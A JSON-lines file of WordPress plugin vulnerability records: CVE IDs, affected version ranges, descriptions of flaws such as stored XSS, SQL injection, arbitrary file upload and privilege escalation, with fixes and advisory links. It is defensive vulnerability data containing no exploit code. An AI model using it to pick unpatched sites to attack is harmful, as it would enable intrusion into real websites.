{"CVE_ID":"CVE-2025-3914","slug":"aeropage-sync-for-airtable","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Aeropage Sync for Airtable plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aeropage_media_downloader' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L1250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a501c2d6-cdcc-4003-99df-245f5253e20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a501c2d6-cdcc-4003-99df-245f5253e20f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4305","slug":"login-as-customer-or-user","versionEndExcluding":"3.3","description":"The Login as User or Customer WordPress plugin before 3.3 lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/286d972d-7bda-455c-a226-fd9ce5f925bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/286d972d-7bda-455c-a226-fd9ce5f925bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4792","slug":"blog-designer-pack","versionEndExcluding":"3.3","description":"The News & Blog Designer Pack WordPress plugin before 3.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13304aca-0722-4bd9-b443-a5fed1ce22da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13304aca-0722-4bd9-b443-a5fed1ce22da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0262","slug":"wp-airbnb-review-slider","versionEndExcluding":"3.3","description":"The WP Airbnb Review Slider WordPress plugin before 3.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d8c28ac-a46c-45d3-acc9-2cd2e6356ba2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d8c28ac-a46c-45d3-acc9-2cd2e6356ba2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9292","slug":"bridge-core","versionImpact":"3.2.0","versionEndExcluding":"3.3","description":"The Bridge Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formforall' shortcode in versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1baa93da-9b55-45e7-b9a9-db331b5d0584?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1baa93da-9b55-45e7-b9a9-db331b5d0584?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3075","slug":"elementor","versionImpact":"3.29.0","versionEndExcluding":"3.29.1","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elementor-element' shortcode in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts sites with 'Element Caching' enabled.","recommendation":"Update to version 3.29.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3302102%40elementor&new=3302102%40elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3302102%40elementor&new=3302102%40elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639693b6-369e-457e-a37e-30bdb8ea7275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/639693b6-369e-457e-a37e-30bdb8ea7275?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1473","slug":"ml-slider","versionEndExcluding":"3.29.1","description":"The Slider, Gallery, and Carousel by MetaSlider WordPress plugin 3.29.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6e6c67b-7d9b-4fdb-8115-c33add7bfc3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6e6c67b-7d9b-4fdb-8115-c33add7bfc3d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3076","slug":"elementor-pro","versionImpact":"3.29.0","versionEndExcluding":"3.29.1","description":"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_text\u2019 parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.29.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.com\\\/pro\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/elementor.com\\\/pro\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c796ee7-5394-40f3-9158-1a006efbf085?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c796ee7-5394-40f3-9158-1a006efbf085?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2302","slug":"advanced-woo-search","versionImpact":"3.28","versionEndExcluding":"3.29","description":"The Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aws_search_terms shortcode in all versions up to, and including, 3.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L175\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L175\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/3.28\\\/includes\\\/class-aws-shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8fca84-3ea1-432f-8cfe-9a1d1f70fa6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef8fca84-3ea1-432f-8cfe-9a1d1f70fa6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8357","slug":"media-library-assistant","versionImpact":"3.27","versionEndExcluding":"3.28","description":"The Media Library Assistant plugin for WordPress is vulnerable to arbitrary file deletion in the \/wp-content\/uploads directory due to insufficient file path validation and user capability checking in the _process_mla_download_file function in all versions up to, and including, 3.27. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files on the server from the \/wp-content\/uploads\/ directory.","recommendation":"Update to version 3.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-main.php#L924\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-main.php#L924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336915%40media-library-assistant&new=3336915%40media-library-assistant&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336915%40media-library-assistant&new=3336915%40media-library-assistant&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8726375f-de67-4c92-9cf8-1bfb7330f327?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8726375f-de67-4c92-9cf8-1bfb7330f327?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13445","slug":"elementor","versionImpact":"3.27.4","versionEndExcluding":"3.27.5","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the border, margin and gap parameters in all versions up to, and including, 3.27.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.27.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3241278%40elementor%2Ftrunk&old=3239949%40elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3241278%40elementor%2Ftrunk&old=3239949%40elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a11e702-34d2-49ee-8762-cc3614a7950a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a11e702-34d2-49ee-8762-cc3614a7950a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7035","slug":"media-library-assistant","versionImpact":"3.26","versionEndExcluding":"3.27","description":"The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mla_tag_cloud and mla_term_list shortcodes in all versions up to, and including, 3.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-tag-cloud.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-tag-cloud.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-term-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/tags\\\/3.26\\\/includes\\\/class-mla-shortcode-term-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3327861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3327861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e02a2b-9033-4022-a7d7-1c81a7f02f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e02a2b-9033-4022-a7d7-1c81a7f02f83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8236","slug":"elementor","versionImpact":"3.25.7","versionEndExcluding":"3.25.8","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter of the Icon widget in all versions up to, and including, 3.25.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.25.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.4\\\/includes\\\/widgets\\\/icon.php#L489\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.4\\\/includes\\\/widgets\\\/icon.php#L489\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192020\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192020\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1305be5-8267-475f-b962-62e3930116e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1305be5-8267-475f-b962-62e3930116e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11722","slug":"acf-frontend-form-element","versionImpact":"3.25.1","versionEndExcluding":"3.25.2","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.25.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This requires an unauthenticated user to have been given permission to view form submissions, and the form submission shortcode be added to a page.","recommendation":"Update to version 3.25.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/admin\\\/admin-pages\\\/submissions\\\/crud.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/admin\\\/admin-pages\\\/submissions\\\/crud.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209204%40acf-frontend-form-element&new=3209204%40acf-frontend-form-element&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209204%40acf-frontend-form-element&new=3209204%40acf-frontend-form-element&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97cef309-da2f-461a-b5a3-3a85c540c7aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8494","slug":"elementor-pro","versionImpact":"3.25.10","versionEndExcluding":"3.25.11","description":"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.25.10 via the 'elementor-template' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of Private, Pending, and Draft Templates. The vulnerability was partially patched in version 3.24.4.","recommendation":"Update to version 3.25.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.com\\\/\",\"name\":\"https:\\\/\\\/elementor.com\\\/\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ada60f-1e20-454e-a9d7-7849be764d81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ada60f-1e20-454e-a9d7-7849be764d81?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-10453","slug":"elementor","versionImpact":"3.25.9","versionEndExcluding":"3.25.10","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Typography Settings in all versions up to, and including, 3.25.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.25.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.25.9\\\/assets\\\/js\\\/editor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.25.9\\\/assets\\\/js\\\/editor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f23604b7-5a7f-4be7-bc73-cb4facdd1e73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11721","slug":"acf-frontend-form-element","versionImpact":"3.24.5","versionEndExcluding":"3.25.1","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.24.5. This is due to insufficient controls on the user role select field when utilizing the 'Role' field in a form. This makes it possible for unauthenticated attackers to create new administrative user accounts, even when the administrative user role has not been provided as an option to the user, granted that unauthenticated users have been provided access to the form.","recommendation":"Update to version 3.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204192\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/frontend\\\/fields\\\/user\\\/class-role.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204192\\\/acf-frontend-form-element\\\/trunk\\\/main\\\/frontend\\\/fields\\\/user\\\/class-role.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11720","slug":"acf-frontend-form-element","versionImpact":"3.24.5","versionEndExcluding":"3.25.1","description":"The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via submission forms in all versions up to, and including, 3.24.5 due to insufficient input sanitization and output escaping on the new Taxonomy form. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default.","recommendation":"Update to version 3.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204192%40acf-frontend-form-element&new=3204192%40acf-frontend-form-element&sfp_email=&sfph_mail=#file32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204192%40acf-frontend-form-element&new=3204192%40acf-frontend-form-element&sfp_email=&sfph_mail=#file32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69a464f4-c357-446f-a5b8-0919d9af56c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69a464f4-c357-446f-a5b8-0919d9af56c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13623","slug":"order-export-and-more-for-woocommerce","versionImpact":"3.24","versionEndExcluding":"3.25","description":"The Order Export for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.24 via the 'uploads' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads directory which can contain exported order information. The plugin is only vulnerable when 'Order data storage' is set to 'WordPress posts storage (legacy)', and cannot be exploited when the default option of 'High-performance order storage' is enabled.","recommendation":"Update to version 3.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-export-and-more-for-woocommerce\\\/trunk\\\/inc\\\/JEMEXP_Order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-export-and-more-for-woocommerce\\\/trunk\\\/inc\\\/JEMEXP_Order.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230283\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d6dffd-8df3-4611-ad94-6d806aa7328a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d6dffd-8df3-4611-ad94-6d806aa7328a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6757","slug":"elementor","versionImpact":"3.24.5","versionEndExcluding":"3.24.6","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 3.23.5 via the get_image_alt function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract either excerpt data or titles of private or password-protected posts.","recommendation":"Update to version 3.24.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96fa9ed7-6c13-4356-8a25-8a309be2b0e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96fa9ed7-6c13-4356-8a25-8a309be2b0e9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.0\\\/includes\\\/controls\\\/media.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.23.0\\\/includes\\\/controls\\\/media.php#L413\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5416","slug":"elementor","versionImpact":"3.23.4","versionEndExcluding":"3.24.0","description":"The Elementor Website Builder \u2013 More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2.","recommendation":"Update to version 3.24.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/traits\\\/button-trait.php#L523\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/traits\\\/button-trait.php#L523\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/image.php#L820\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/image.php#L820\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/social-icons.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/social-icons.php#L659\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/testimonial.php#L608\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.21.8\\\/includes\\\/widgets\\\/testimonial.php#L608\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149264\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149264\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
